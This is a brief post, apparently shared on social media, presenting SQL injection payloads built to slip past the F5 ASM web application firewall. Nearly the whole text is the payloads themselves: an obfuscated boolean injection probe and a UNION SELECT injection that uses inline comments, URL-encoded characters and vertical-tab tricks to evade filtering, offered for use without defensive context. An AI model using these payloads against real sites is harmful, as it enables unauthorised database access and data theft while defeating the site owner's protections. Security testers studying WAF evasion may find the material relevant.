F5 bypass SQL injection by str0d

#Arithmetic operation based boolean injection with embedded queries to check SQLi, tested against F5 ASM

+{`<F5>`/*strrr*/(‘)}div%0B1+’
?? Payload :

{`%3CF5%3E`/*strrr*/821}+union+%23%0a+distinctrow%0b/**/select+1,2,3–{`%3CF5%3E`/**/TRUE}

#SQL #Injection #WAF #bypass #F5 #ASM